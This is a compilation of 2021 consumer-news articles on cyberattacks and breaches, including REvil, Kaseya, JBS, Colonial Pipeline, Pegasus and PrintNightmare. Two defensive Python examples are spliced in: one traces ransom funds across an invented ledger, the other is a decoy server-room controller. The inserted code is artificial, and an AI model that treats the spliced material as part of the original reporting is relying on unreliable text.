“The United States ganged up with its allies to make unwarranted accusations against Chinese cybersecurity,” said foreign ministry spokesman Zhao Lijian. “This was made up out of thin air and confused right and wrong. It is purely a smear and suppression with political motives. China will never accept this.” 

Cybersecurity researchers discover Windows malware that gets installed via ads

Cybersecurity firm Bitdefender has discovered a new form of malware that gets installed through advertisements in search results. The company says the malware specifically targets Windows devices and is being used to steal passwords, install cryptocurrency miners, and deliver additional trojan malware. 

The researchers dubbed the new form of malware MosaicLoader because of “the intricate internal structure that aims to confuse malware analysts and prevent reverse-engineering.” 

Defending yourself

Once delivered into a system via ads, the malware goes to work by downloading a variety of threats. Those threats include the malware Glupteba, which creates a backdoor onto infected systems and could allow bad actors to steal sensitive information. Links to the malware show up at the top of search results posing as cracked installers.

“The best way to defend against MosaicLoader is to avoid downloading cracked software from any source,” the researchers said in a whitepaper accompanying the report. “Besides being against the law, cybercriminals look to target and exploit users searching for illegal software.” 

“We recommend always checking the source domain of every download to make sure that the files are legitimate and to keep your antimalware and other security solutions up to date,” the researchers added. 

The team noted that people working from home are more likely to be victims of the scheme because they are more likely to download cracked software. It’s believed that those behind the MosaicLoader operation are aiming to compromise as many Windows machines as possible, so it’s very important for consumers and businesses to take this threat seriously.

"From what we can tell, this new MosaicLoader attempts to infect as many devices as possible, likely to build up market share and then sell access to infected computers to other threat actors," Bogdan Botezatu, director of threat research and reporting at Bitdefender, told ZDNet. 

E.U. condemns use of spyware on journalists following widespread spyware breach

The European Union (E.U.) says any use of spyware to take advantage of what journalists are communicating on their electronic devices is not only improper but also ill-advised.

The reaction comes after reports by non-profit journalism group Forbidden Stories suggested that Israeli software had been leveraged to break into the smartphones of up to 50,000 journalists, government officials, and rights activists across the globe.

"What we could read so far -- and this has to be verified, but if it is the case -- it is completely unacceptable. Against any kind of rules we have in the European Union," European Commission President Ursula von der Leyen said during a trip to the Czech Republic. 

The Israeli spyware von der Leyen is referring to is called “Pegasus,” and it comes from NSO Group Technologies -- the same cybersecurity intelligence company that was accused of hacking WhatsApp and installing spyware on users’ phones. Pegasus is especially dangerous because it can allegedly infect phones without a user ever having to click on anything.

According to reports, an investigation of the hacked phone numbers revealed that journalists from Al Jazeera, CNN, The Financial Times, the Associated Press, The New York Times, The Wall Street Journal, Bloomberg News, and French newspaper Le Monde were targeted. Amnesty International says potential surveillance targets have also included heads of state, activists, and journalists, including Jamal Khashoggi’s family.

NSO denies involvement

In response, NSO says Forbidden Stories’ report is “full of wrong assumptions and uncorroborated theories.” While defending its own credibility, it did its best to discredit Forbidden Stories, questioning the reliability and interests of the group’s sources. 

“It seems like the ‘unidentified sources’ have supplied information that has no factual basis and are far from reality,” NSO said in a statement posted on its website.

NSO is taking the allegations seriously and says that they’re so outrageous that it's considering a defamation lawsuit. Furthermore, it claims that software like Pegasus is available to “anyone, anywhere, and anytime” and is part of the arsenal of software many governmental agencies and private companies already have in place. 

“We would like to emphasize that NSO sells its technologies solely to law enforcement and intelligence agencies of vetted governments for the sole purpose of saving lives through preventing crime and terror acts. NSO does not operate the system and has no visibility to the data,” the company stated.

“Our technologies are being used every day to break up pedophilia rings, sex and drug-trafficking rings, locate missing and kidnapped children, locate survivors trapped under collapsed buildings, and protect airspace against disruptive penetration by dangerous drones. Simply put, NSO Group is on a life-saving mission, and the company will faithfully execute this mission undeterred, despite any and all continued attempts to discredit it on false grounds.”

Biden administration accuses China of being behind major cyberattacks

On Monday, the Biden Administration, along with governments in Europe and Asia, formally accused China of being behind a string of hacks and cyberattacks in recent months. 

In a coordinated announcement, the U.S. and its foreign allies accused China's Ministry of State Security of using "criminal contract hackers" to carry out malicious cyber activities with the intent of making a profit. The U.S. said China’s MSS used these contract hackers "to conduct unsanctioned cyber operations globally, including for their own personal profit."

"The United States has long been concerned about the People's Republic of China's irresponsible and destabilizing behavior in cyberspace," a senior U.S. administration official said. "Their operations include criminal activities, such as cyber-enabled extortion, crypto-jacking, and theft from victims around the world for financial gain.” 

Large ransom requests

Specifically, the governments blamed China for the hack of Microsoft’s Exchange email server software, which compromised tens of thousands of computers across the globe and gave hackers access to large amounts of sensitive data. 

E.U. policy chief Josep Borrell said in a statement that the hacking was "conducted from the territory of China for the purpose of intellectual property theft and espionage." U.K. Foreign Secretary Dominic Raab said China's actions represent "a reckless but familiar pattern of behavior” and that the Chinese government “must end this systematic cyber sabotage and can expect to be held to account if it does not.” 

The U.S. official said China was also behind a ransomware attack against a U.S. target that involved a "large ransom request.” Ransom demands from China have been in the “millions of dollars,” the official added.

No sanctions announced

No punishments against China have been announced, but the U.S. said it has “raised its concerns” with Beijing. 

“The first important piece is the publicly calling out the pattern of irresponsible malicious cyber activity, and doing it with allies and partners,” the official said, adding that the U.S. is “not ruling out further actions to hold (China) accountable.”

Separately, four Chinese nationals and residents of China were indicted Monday over "a campaign to hack into the computer systems of dozens of victim companies, universities and government entities in the United States and abroad between 2011 and 2018."

New survey shows how much consumers trust social media sites

What would our lives be like if Facebook, Twitter, TikTok, and Instagram had never come on the scene? How much time have we given away to our devices that we’ll never get back? How much of our personal data -- where we live, who our friends are, what we eat and drink, what teams we root for, and where we work -- have we given away to data collectors and hackers?

In a new survey from Grand Canyon University, 1,162 people were asked about their opinions on social media data privacy and confessed that while social media often brings them together, it also has some negative side effects. 

The findings

The respondents were asked to assess how safe they feel their data is on social media sites, which social media platforms they trust most and least, and how far they’ve gone to make sure their accounts are secure. 

Some of the more interesting insights included:

Have you been hacked? Close to one-third (32%) of the respondents admitted that they have had their data hacked on a social media site. Who’s the biggest culprit? Facebook, which has been hacked or had its users' data exploited more times than it probably wishes to count.

Have you deleted a social media account because of social media concerns? Here’s where things start to get a bit unnerving. Almost half (48%) of the people surveyed say they’ve deleted a social media account due to privacy concerns.

“With such high rates of deletion for privacy concerns, it is clear that customer privacy and online safety should be a top priority for social media companies who make more money from high numbers of active users,” the researchers said. “For many individuals, the question of whether companies will actually work to improve privacy is very important.”

Do you trust social media? When asked whether they trust social media, it was an even 50/50 split. Half of the respondents said they trust social media (50.3%), while the other half (49.7%) said they don’t. 

Which platforms do you trust the most? The survey asked respondents to rate how much trust they put in each social media platform on a scale of 1-10. While many may not think of YouTube as a standard social media platform, it topped the list with a rating of 6.1. That was followed by Twitter with a score of 5.7. TikTok -- which has been hit by hackers and lawmakers alike -- earned the lowest average trust rating of only 4.3. 

What are you doing to protect yourself on social media? The two most common approaches (59%) that respondents use to stay safe are only connecting with people they know and manually reviewing social media platforms’ privacy settings. Where most social media users leave themselves vulnerable is staying logged into an account after they’ve used it (65%) and not employing unique passwords for social media accounts (55%).

Identity theft is on its way to a record year

There seems to be no end in sight when it comes to identity theft. The Identity Theft Resource Center (ITRC), a nonprofit organization established to support victims of identity crime, has just released its U.S. data breach findings for the first half of 2021. If what the organization found is true, it’s troubling to say the least -- particularly for businesses.

According to the data breach analysis, publicly reported data breaches shot up by 38% in the second quarter of 2021 alone. Fortunately, the number of individuals impacted -- 52.8 million -- dropped by 20% from the first quarter to the second quarter. 

“The lesson here for businesses is that no organization is too small to be attacked – directly or indirectly in a supply chain attack – and cybercriminals are increasingly organized and strategic in who they attack and what information they want to steal,” James E. Lee, COO of the ITRC, told ConsumerAffairs.

If things continue at the same rate for the rest of the year, the increase in data breaches in 2021 will end with a record-setting number of compromises, exceeding the current all-time record of 1,632 set in 2017. However, the silver lining to that cloud is that the number of people impacted by data compromises would be the lowest since 2014.

Businesses need to do more to protect their customers’ data

Most identity theft cases can be chalked up to phishing attacks, ransomware attacks, and supply chain attacks. While those attacks have created problems for businesses and continue to increase, consumers still need to be concerned even if they’re not being directly targeted. 

“The effects of these hacks will trickle down and have far-reaching consequences for individuals; disruption when it comes to accessing services, a potential increase in the cost of goods as companies increase prices to foot ransom bills, and the likelihood that customer data will be exploited,” Madeleine Hodson, Chief Editor of PrivacySharks, told ConsumerAffairs.

James E. Lee, Chief Operating Officer of the ITRC, agreed with Hodson, saying that businesses need to step up for the sake of their customers’ security. 

“While we are happy that the number of individuals impacted is down, the risk of an identity crime still exists and has real consequences. Businesses need to take actions to make sure they are not collecting too much information since cybercriminals cannot take what organizations do not have,” he told ConsumerAffairs. 

“There is nothing a consumer can do to prevent a data breach, that’s why good cyber-hygiene practices like multifactor authentication and strong, unique passphrases are essential.” 


Russia-linked ‘Cozy Bear’ hackers breach Republican party computer systems

A group of hackers with ties to the Russian government breached the computer systems of the Republican National Committee (RNC) last week, Bloomberg reported. The hackers are allegedly affiliated with the group Cozy Bear and carried out an attack on Synnex, a company that provides IT services for the RNC.

"Over the weekend, we were informed that Synnex, a third party provider, had been breached. We immediately blocked all access from Synnex accounts to our cloud environment,” RNC chief of staff Richard Walters said in a statement. "Our team worked with Microsoft to conduct a review of our systems and after a thorough investigation, no RNC data was accessed.”

Synnex put out a statement of its own on July 6 saying that it is “aware of a few instances where outside actors have attempted to gain access, through Synnex, to customer applications within the Microsoft cloud environment.” The company also said it’s continuing to review the attack in collaboration with Microsoft and a security firm. 

Cyberattack efforts ‘almost certainly’ ongoing

This isn’t the first time that members of Cozy Bear have been accused of working with Russian foreign intelligence to target U.S. government organizations. In 2016, the hacker group was accused of breaching the Democratic National Committee. It has also been accused of carrying out a cyberattack against SolarWinds -- a breach that affected nine government agencies. 

The latest breach comes on the heels of a series of ransomware attacks in the U.S. In the last year, Colonial Pipeline, insurance provider CNA, and IT software provider Kaseya have been targeted by these attacks. 

In a report published Thursday, intelligence agencies from the U.S. and U.K. said Russian military hackers have attempted to access the computer networks of "hundreds of government and private sector targets worldwide" between mid-2019 and early 2021. The agencies warned that those "efforts are almost certainly still ongoing."


Microsoft issues patches for PrintNightmare vulnerability

Microsoft has issued a security patch for the so-called PrintNightmare flaw, which affects the Print Spooler feature that runs by default on Windows. 

The tech giant confirmed the vulnerability last week after security researchers at Sangfor accidentally published proof-of-concept (PoC) exploit code. In doing so, the researchers effectively enabled bad actors to carry out remote code execution attacks and gain system-level privileges. 

Microsoft has now issued out-of-band security updates to fix the flaw, which has been given the number CVE-2021-34527 and been deemed “critical” in nature.

The company is issuing updates for Windows 10, Windows Server 2019, Windows Server 2012 R2, Windows Server 2008, Windows 8.1, and Windows RT. In yet another indication that Microsoft sees the flaw as a major problem, a patch is also being issued for Windows 7 -- an operating system that Microsoft stopped supporting last year.

“We recommend that you install these updates immediately,” says Microsoft. “The security updates released on and after July 6, 2021 contain protections for CVE-2021-1675 and the additional remote code execution exploit in the Windows Print Spooler service known as ‘PrintNightmare’, documented in CVE-2021-34527.”

Security updates for Windows Server 2012, Windows Server 2016, and Windows 10 Version 1607 “will be released soon,” Microsoft said. 


Hacker group locks up a million devices and demands $70 million in ransom

While many consumers were celebrating the Fourth of July, a ring of international hackers were celebrating for an entirely different reason. Over the holiday weekend, the cybercrooks locked up more than a million individual computer devices and were demanding $70 million in bitcoin as a ransom.

The hackers have been identified as REvil, the Russian group known for hacking meat supplier JBS earlier this year. This time around, REvil compromised Kaseya Limited, a U.S. software company that develops IT management software. 

The hack affected many of Kaseya’s customers, including the Swedish grocery store chain Coop. It forced the company to close more than half of its 800 stores and rendered the retailer’s cash registers and self-service checkouts inoperable.

Hackers upping their game

Cybersecurity analysts worry that REvil has pushed the limits of hacking further than experts are equipped to handle. Some of Kaseya's customers are firms that oversee internet services for other companies, so REvil was able to snowball the number of victims rapidly. 

While many hack attacks try to tie up a single, standalone company, REvil was able to isolate each computer in Kaseya’s list of customers and ransom it separately. Reports say that REvil’s initial ransom request was for $45,000 to unlock each individual device.

On its face, Kaseya’s situation sounds dire. However, the company said things aren’t as bad as they seem.

“While impacting approximately 50 of Kaseya’s customers, this attack was never a threat nor had any impact to critical infrastructure,” said Fred Voccola, the company’s CEO. “Many of Kaseya’s customers are managed service providers, using Kaseya’s technology to manage IT infrastructure for local and small businesses with less than 30 employees, such as dentists’ offices, small accounting offices and local restaurants.”

Added up, Voccola said only 800 to 1,500 of Kaseya’s customers were compromised by the hack out of an estimated 800,000 to 1,000,000 local and small businesses it manages. Nonetheless, Voccola said his company’s global teams were working around the clock to get its customers back up and running. 

“We understand that every second they are shut down, it impacts their livelihood, which is why we’re working feverishly to get this resolved,” he said.

President Biden offers “full resources” to hacked victims

Shortly after REvil’s attack was set in motion, the U.S. government stepped in to help. Over the weekend, the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) worked with Kaseya to offer some assistance to the victims of the hack. 

President Biden said he was offering the “full resources” that he has at his disposal to assist in the response. As part of the effort, FBI and CISA officials created a detection tool for small businesses that uses Kaseya’s platform to analyze their computer systems and determine whether any indicators of a hack are present.


LinkedIn data breach grows to include over a billion hacked files

Remember that LinkedIn breach that put 700 million user records at risk? That number has now risen to a billion records that include the personal information of LinkedIn users.

The hacker, whoever they are, is having quite a field day. They have just updated their personal data trove with email addresses and passwords on top of other scraped personal information from LinkedIn users.

In reporting the new finding, PrivacySharks said it reached out to LinkedIn for verification. The firm received this official statement from Leonna Spilman, a corporate communications manager at LinkedIn:

“While we’re still investigating this issue, our initial analysis indicates that the dataset includes information scraped from LinkedIn as well as information obtained from other sources. This was not a LinkedIn data breach, and our investigation has determined that no private LinkedIn member data was exposed. Scraping data from LinkedIn is a violation of our Terms of Service, and we are constantly working to ensure our members’ privacy is protected.”

A review of what’s been hacked

PrivacySharks said its investigation turned up evidence that the files now contain the following 14 pieces of personal data:

  • Names (first and last)
  • Email addresses
  • Street addresses
  • Cities
  • States
  • Zip Codes
  • Phone numbers
  • Websites
  • LinkedIn profiles
  • Company names
  • Job titles
  • Fax numbers
  • Email and password combinations
  • LinkedIn connections

Given that the person behind the update is the same one linked to the original breach, most of the data is probably the same as what was exposed previously. 

What should LinkedIn members do?

Putting personal information on a site like LinkedIn was problematic for many users before details of this breach were publicized. One ConsumerAffairs reviewer named Lisa summed up her thoughts quite nicely.

“I personally do not like the idea of posting a resume for everyone to see when there are so many safety issues and Internet hackers out there,” she said.

If all that’s been reported is accurate, then LinkedIn users are up against a high wall when it comes to protecting their personal data -- and the platform has to be nervous about the potential fallout.

“From a consumer's point of view, I think the fact that this is the third LinkedIn data leak in a few months will be extremely unsettling for users,” Madeleine Hodson, Chief Editor at PrivacySharks told ConsumerAffairs. “Since passwords have been included in this recent leak (although not yet confirmed to be from LinkedIn accounts) it will cause concern and lead users to question the strength of LinkedIn's security measures.”


Researchers find security flaw in Peloton Bike+ that allows hackers to spy on riders

Researchers have found that the Peloton Bike+ had a flaw that rendered it vulnerable to being remotely hacked. The product isn’t yet commercially available, but researchers said the flaw would enable hackers to spy on riders -- and even their surroundings -- in public spaces such as a hotel or a gym. 

Software security company McAfee said the flaw in the stationary bike stemmed from the Android attachment that accompanies it. Researchers said attackers could access the bike through the port and install phony versions of popular apps like Netflix and Spotify. The fake apps could then be used to dupe users into entering their personal information. 

"The flaw was that Peloton actually failed to validate that the operating system loaded," said Steve Povolny, head of the threat research team. "And ultimately what that means then is they can install malicious software, they can create Trojan horses and give themselves back doors into the bike, and even access the webcam.

"Not only could you spy on riders but, maybe more importantly, their surroundings, sensitive information," Povolny said.

Peloton reportedly patched the issue on June 4, and researchers said there aren’t currently any indications that the flaw has been exploited. Prior to being fixed, the report said the flaw might have left users vulnerable to being watched.

“An unsuspecting gym-goer taking the Peloton Bike+ for a spin could be in danger of having their personal data compromised and their workout unknowingly watched,” the report stated.

Previous dangerous flaw

This isn’t the first time Peloton has confirmed a flaw. Last month, the company recalled all of its Tread+ and Tread treadmills over safety concerns after 70 consumers were injured and a child died after being sucked under the belt. Officials addressed the issue by updating the products’ software to require users to enter a code to restart the belt if it has been left unmoving for up to 45 seconds.

Peloton confirmed that the flaw researchers recently found on the Bike+ was also found on the recalled Peloton Tread. On its security and compliance page, the company warns that “no matter how much effort we put into system security, there can still be vulnerabilities present.”


Volkswagen discloses data breach affecting around 3.3 million customers

Volkswagen has revealed that a vendor’s security oversight led to the exposure of data belonging to around 3.3 million customers and prospective buyers. The automaker said information was exposed after a supplier left the data unsecured online. 

In a customer letter, Volkswagen said most of the exposed data included names, addresses, emails, and phone numbers. In some instances, the data also included information about a vehicle purchased, leased, or inquired about, such as the Vehicle Identification Number (VIN), make, model, year, color, and trim packages.

Around 90,000 potential loan clients in the U.S. and Canada also had more sensitive data exposed, including driver's license numbers. Volkswagen said date of birth and social security numbers were exposed in a "small" number of cases. 

Data left unsecured for two years

The exposed data was collected between 2014 and 2019 and was left unprotected online between August 2019 and May 2021. The company didn't name the vendor responsible for the data exposure, nor did it say whether it knows if the data has been misused by scammers. Volkswagen said it has informed the appropriate authorities about the situation. 

“We take the safeguarding of your information very seriously,” the company said. “We have informed the appropriate authorities, including law enforcement and regulators. We are working with external cybersecurity experts to assess and respond to this situation and have taken steps to address the matter with the vendor.” 

VW said in the letter that it has partnered with IDX to provide customers with free credit protection services, including monitoring, insurance reimbursement, and identity theft recovery services if any issues arise. 


Game developer EA hit by major data breach

Electronic Arts (EA) -- the game developer responsible for video games like Star Wars Battlefront, The Sims, Need for Speed, Madden NFL, and Apex Legends -- has been gamed itself. According to Motherboard, EA has become the victim of a cyberattack.

Not only did hackers swipe the source code for FIFA 21 and the Frostbite engine (which is the backbone for EA’s soccer/football series as well as Battlefield), but they are reportedly advertising that the data they stole is for sale on hacking forums. Motherboard reports that the hackers will only consider offers from well-known, marquee hackers.

An EA spokesperson confirmed that while hackers stole “a limited amount of game source code and related tools,” they did not gain access to player data. The company said it is confident that the hack won’t impact other games or its business as a whole. Nonetheless, it’s putting additional security in place. 

Source code is like gold in the video game industry

Luckily for EA, the hack isn’t one of the ugly ransomware kinds that targeted JBS and the Colonial Pipeline. The developer said it’s working with law enforcement to investigate the incident.

When companies like EA lose control over their source code, things can spiral out of control. “Source code is a big deal in programming, so it’s a big deal when companies lose control over it,” remarked The Verge’s Mitchell Clark.

Clark says EA’s not alone. Recently, the gaming industry has seen similar source code thefts for Cyberpunk 2077, The Witcher 3, and Super Mario Kart. Nintendo was also involved in a “gigaleak” that led to the loss of an unreleased Zelda game.


JBS says it paid $11 million to cybercriminals who took out its systems

JBS, the world’s largest meat supplier, said Wednesday that it paid $11 million in ransom in response to the cyberattack that recently shut down its North American and Australian operations.

In a statement, the company said the ransom payment was made after most of its plants had come back online. 

"This was a very difficult decision to make for our company and for me personally," said Andre Nogueira, CEO of JBS USA, in a statement. "However, we felt this decision had to be made to prevent any potential risk for our customers."

Earlier this month, the cyberattack forced JBS to shut down some of its computer networks after an organized attack by an unidentified hacker group. The government has since attributed the ransomware attack to REvil, a criminal group believed to be based in Russia or Eastern Europe.

“As the lead federal investigative agency fighting cyber threats, combating cybercrime is one of the FBI’s highest priorities,” the FBI said in a statement. “We have attributed the JBS attack to REvil and Sodinokibi and are working diligently to bring the threat actors to justice. A cyberattack on one is an attack on us all.”

No data compromised

In Wednesday’s statement, JBS said no data was leaked as a result of the attack. 

"Preliminary investigation results confirm that no company, customer or employee data was compromised," JBS said.

The JBS cyberattack was the latest in a string of ransomware attacks on companies’ computer systems. In May, the operators of the Colonial Pipeline paid roughly $4.4 million to the gang of hackers that broke into its systems. 

“This decision was not made lightly,” but it was one that had to be made, a company spokesman said last month. “Tens of millions of Americans rely on Colonial – hospitals, emergency medical services, law enforcement agencies, fire departments, airports, truck drivers and the traveling public.”


U.S. tracks down and seizes Bitcoin ransom paid by Colonial Pipeline

When a hacker group shut down the Colonial Pipeline with a ransomware attack last month, it caused a spike in East Coast gasoline prices and resulted in the company paying a ransom in Bitcoin to regain control of its network.

The U.S. Justice Department now reports that it was able to track down the digital wallet containing 63.7 bitcoins and seize the assets. At the time the ransom was paid, the bitcoins were worth $4.4 million.

Colonial said it paid the ransom because it wasn’t sure about the extent to which its network had been compromised. But at the same time, the company was working closely with the FBI and the Department of Justice’s new digital investigations unit to help track the payment to a Russian hacker group known as Darkside.

“Following the money remains one of the most basic, yet powerful tools we have,” said Deputy Attorney General Lisa Monaco. “Ransom payments are the fuel that propels the digital extortion engine, and today’s announcement demonstrates that the United States will use all available tools to make these attacks more costly and less profitable for criminal enterprises.”

Seizing digital assets

Previously, it was believed that payments made to criminals and scammers using Bitcoin were untraceable and not retrievable -- a major reason that the digital currency is favored by criminal enterprises.

U.S. investigators reviewed the Bitcoin public ledger and were able to track multiple transfers and identify that approximately 63.7 Bitcoins, representing the proceeds of Colonial’s ransom payment, had been transferred to a specific address. 

The FBI has the “private key,” the rough equivalent of a password, needed to access assets held at that specific Bitcoin address. Officials said the digital assets it discovered were involved in money laundering and could therefore be seized under criminal and civil forfeiture statutes. 
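The tracing step described above, following a payment across the public ledger through several transfers until the funds come to rest, can be shown on a toy transaction graph. The following is an added example and not the Justice Department’s or FBI’s tooling: the ledger, addresses and amounts are constructed, and the taint rule it uses (every output of a transaction that spends traced coins is itself traced) is a simplifying assumption, not how any agency actually attributes funds when unrelated coins are mixed in.

```python
"""Follow a ransom payment across a constructed transaction graph.

Added example for the tracing passage above; not government tooling. The
ledger is made up, and the 'poison' taint rule (every output of a spending
transaction is treated as traced) is a simplifying assumption.
"""
from __future__ import annotations
from collections import deque
from dataclasses import dataclass


@dataclass(frozen=True)
class Outpoint:
    """One spendable output: which transaction created it and at which index."""
    txid: str
    index: int


@dataclass
class Tx:
    txid: str
    inputs: list[Outpoint]            # outpoints this transaction spends
    outputs: list[tuple[str, float]]  # (address, amount in BTC)


# Constructed ledger: a 75 BTC payment is split, and the larger part hops
# once more before coming to rest at addr_D. Txids and amounts are made up.
LEDGER = [
    Tx("coinbase", [], [("victim_addr", 75.0)]),
    Tx("ransom", [Outpoint("coinbase", 0)], [("addr_A", 75.0)]),
    Tx("tx2", [Outpoint("ransom", 0)], [("addr_B", 63.7), ("addr_C", 11.3)]),
    Tx("tx3", [Outpoint("tx2", 0)], [("addr_D", 63.7)]),
]


def build_indexes(txs: list[Tx]):
    """Return (txid -> Tx, outpoint -> txid of the transaction that spends it)."""
    by_id = {tx.txid: tx for tx in txs}
    spender: dict[Outpoint, str] = {}
    for tx in txs:
        for op in tx.inputs:
            if op in spender:
                raise ValueError(f"double spend of {op}")
            spender[op] = tx.txid
    return by_id, spender


def trace(txs: list[Tx], start: Outpoint):
    """Breadth-first walk from `start` to every unspent traced output.

    Returns a list of (path of txids, address, amount), one entry per
    terminal (unspent) output, in discovery order.
    """
    by_id, spender = build_indexes(txs)
    if start.txid not in by_id:
        raise KeyError(start.txid)
    terminals = []
    queue = deque([(start, [start.txid])])
    seen = {start}
    while queue:
        op, path = queue.popleft()
        if op not in spender:                      # unspent: funds rest here
            address, amount = by_id[op.txid].outputs[op.index]
            terminals.append((path, address, amount))
            continue
        next_tx = by_id[spender[op]]
        for i in range(len(next_tx.outputs)):      # taint every output of the spender
            child = Outpoint(next_tx.txid, i)
            if child not in seen:
                seen.add(child)
                queue.append((child, path + [next_tx.txid]))
    return terminals


def resting_places(txs: list[Tx], start: Outpoint) -> dict[str, float]:
    """Map address -> amount for the unspent outputs reachable from `start`."""
    result: dict[str, float] = {}
    for _path, address, amount in trace(txs, start):
        result[address] = result.get(address, 0.0) + amount
    return result


if __name__ == "__main__":
    for path, address, amount in trace(LEDGER, Outpoint("ransom", 0)):
        print(" -> ".join(path), f"{address}: {amount} BTC")
```

Run against the constructed ledger, the walk reports that 63.7 BTC of the payment sits unspent at addr_D after three hops and 11.3 BTC at addr_C after two. On a real chain the same walk explodes quickly once traced coins are merged with unrelated inputs, which is why analysts combine it with clustering heuristics rather than relying on taint alone.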

The company was a big help

Monaco said the fact that executives at Colonial Pipeline contacted the FBI immediately aided the search for the funds.

“Today’s announcements also demonstrate the value of early notification to law enforcement; we thank Colonial Pipeline for quickly notifying the FBI when they learned that they were targeted by DarkSide,” Monaco said.

As news of the government’s seizure was announced, the value of Bitcoin plunged 8%. According to CNBC, the move may be related to the discovery that the digital currency may not be as anonymous and untraceable as people thought.


New 'Shadow Figment' cybersecurity technology lures in hackers and prevents cyberattacks

Cyberattacks have recently affected everything from meat producers to gasoline pipelines, and the potential impact of these online attacks is significant. Now, experts from the U.S. Department of Energy’s Pacific Northwest National Laboratory (PNNL) are developing new cybersecurity technology that’s designed to trick hackers and prevent serious cyberattacks. 

Experts designed a new tool called Shadow Figment, which creates a fake online world that mimics the way real online portals would respond to hackers. The system depends on software engineers who work behind the scenes to trick hackers into interacting with imaginary sites so that they can’t harm real targets. This gives time for experts to come in so they can face the threat.

“Our intention is to make interactions seem realistic, so that if someone is interacting with our decoy, we keep them involved, giving our defenders extra time to respond,” said researcher Thomas Edgar. 

Preventing cyberattacks

Electricity grids, pipelines, and water systems are all controlled by intricate online systems. A cyberattack on any one of these systems, which are often controlled by a multitude of devices, could put consumers’ health and safety at serious risk. 

With Shadow Figment, the system creates a distraction for the attacker that will interact much in the same way that the intended system is designed to respond. Using machine learning techniques, the software studies the actual system and then comes up with a harmless replica for hackers on-screen; this deceives criminals into thinking they’ve easily gotten into their desired point of attack. 

The technology is successful because it tricks the hackers into thinking their maneuvers are successful, which keeps them engaged in the “attack” for longer periods of time. The researchers gave the example of tampering with the temperature in a server room that needs to remain cool to function properly; Shadow Figment will indicate that the temperature in the room has gone up, which would prompt the hacker to continue on with their attack. 

The goal is to keep the hackers involved in the fake world so that software engineers can study their behaviors and work to prevent a serious attack. The more time the hacker spends in Shadow Figment, the more time that engineers have to work on the defense. 
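To make the server-room example above concrete, here is a small decoy controller written in the spirit of what the researchers describe. It is an added illustration, not PNNL’s Shadow Figment code: the tag names, the limits, the ambient heat load and the thermal time constant are all assumptions. The point it shows is that a convincing decoy answers a setpoint change with a physically plausible temperature trajectory (the room warms gradually and never above what the real plant could reach), while every interaction is logged for defenders, and any write at all is treated as an alert because nobody legitimate writes to a decoy.

```python
"""A decoy server-room cooling controller (added example, not PNNL code).

The thermal model, tag names and limits are assumptions chosen to make the
decoy respond the way the real plant plausibly would.
"""
from __future__ import annotations
import math
from dataclasses import dataclass, field

# Tags the decoy exposes; constructed names.
TAGS = ("room_temp", "setpoint", "cooling_on")


@dataclass
class DecoyRoom:
    setpoint: float = 18.0       # degrees C the simulated chillers aim for
    room_temp: float = 18.0      # currently reported temperature
    cooling_on: bool = True
    ambient: float = 30.0        # where the room drifts with cooling off (assumed heat load)
    tau_minutes: float = 20.0    # thermal time constant (assumed)
    audit_log: list[dict] = field(default_factory=list)

    def _record(self, actor: str, action: str, tag: str, value=None) -> None:
        self.audit_log.append({"actor": actor, "action": action, "tag": tag, "value": value})

    def read(self, tag: str, actor: str):
        """Reads look exactly like the real controller, and are logged too."""
        if tag not in TAGS:
            self._record(actor, "read-unknown", tag)
            return None
        self._record(actor, "read", tag)
        return getattr(self, tag)

    def write(self, tag: str, value, actor: str) -> bool:
        """Accept writes within the real controller's limits and reject the rest,
        so the decoy's error behaviour matches the plant it imitates."""
        if tag == "setpoint":
            if not 10.0 <= float(value) <= 40.0:
                self._record(actor, "write-rejected", tag, value)
                return False
            self.setpoint = float(value)
        elif tag == "cooling_on":
            self.cooling_on = bool(value)
        else:
            self._record(actor, "write-rejected", tag, value)
            return False
        self._record(actor, "write", tag, value)
        return True

    def step(self, minutes: float) -> float:
        """Advance the simulated plant by `minutes`.

        Newton's law of cooling toward the target; the chillers can only
        remove heat, so the reported temperature never exceeds ambient.
        """
        target = min(self.setpoint, self.ambient) if self.cooling_on else self.ambient
        k = 1.0 - math.exp(-minutes / self.tau_minutes)
        self.room_temp += (target - self.room_temp) * k
        return self.room_temp

    def alerts(self) -> list[dict]:
        """Every write attempt, accepted or rejected, is an alert on a decoy."""
        return [e for e in self.audit_log if e["action"].startswith("write")]


if __name__ == "__main__":
    room = DecoyRoom()
    room.write("setpoint", 35.0, actor="10.0.0.5")      # constructed intruder address
    for minute in range(10, 70, 10):
        print(f"t={minute:3d} min  room_temp={room.step(10):.2f} C")
    print("alerts:", room.alerts())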

“We’re buying time so the defenders can take action to stop bad things from happening,” said Edgar. “Even a few minutes is sometimes all you need to stop an attack. But Shadow Figment needs to be one piece of a broader program of cybersecurity defense. There is no one solution that is a magic bullet.” 

While there is still a patent pending for Shadow Figment, the technology is designed to benefit and protect everyone. 

“The development of Shadow Figment is yet another example of how scientists are focused on protecting the nation’s critical assets and infrastructure,” said researcher Kannan Krishnaswami. “This cybersecurity tool has far-reaching applications in government and private sectors -- from city municipalities, to utilities, to banking institutions, manufacturing, and even health providers.” 


FBI identifies Russian hackers behind JBS hack

The FBI says it knows who was behind the recent cyberattack that sidelined JBS, the world’s largest meat producer. The agency linked the deed to a notorious Russian ransomware gang and says it is working to stop the cyber bandits from doing any further harm.

“As the lead federal investigative agency fighting cyber threats, combating cybercrime is one of the FBI’s highest priorities,” the agency said in a statement. “We have attributed the JBS attack to REvil and Sodinokibi and are working diligently to bring the threat actors to justice. A cyberattack on one is an attack on us all.”

REvil/Sodinokibi sits atop all other ransomware groups, with a 12.5% share of the ransomware market -- and it’s been a busy bunch too. So far this year, it claimed that it stole unencrypted data from electronics company Acer, pilfered information from the celebrity law firm that represents Lady Gaga and Madonna, and made off with plans for upcoming Apple products.

Consumers are safe… for the moment

When a business is hacked, its customer database is usually part of the theft. Take, for example, the attack on Marriott hotels that exposed the personal details of 500 million hotel guests.

While consumers used to be easy targets for ransomware groups, one cybersecurity expert says cybercriminals tend not to go after the general population as much anymore because it’s just not that lucrative to do so.

“Consumers are more trouble than they are worth,” said Dick O'Brien, principal editor at Symantec, who authored a special report on targeted ransomware. "A lot of the consumers these days do not use computers that much, and ransomware is designed to infect Windows computers—they are not in the firing line, as much as enterprise users. Enterprises are—I would not say an easier target, but there are more possibilities for a compromise with them."

Ransomware still impacts consumers

ConsumerAffairs reached out to Purandar Das, co-founder at data security platform Sotero, to find out what trickle-down effect ransomware might have on consumers.

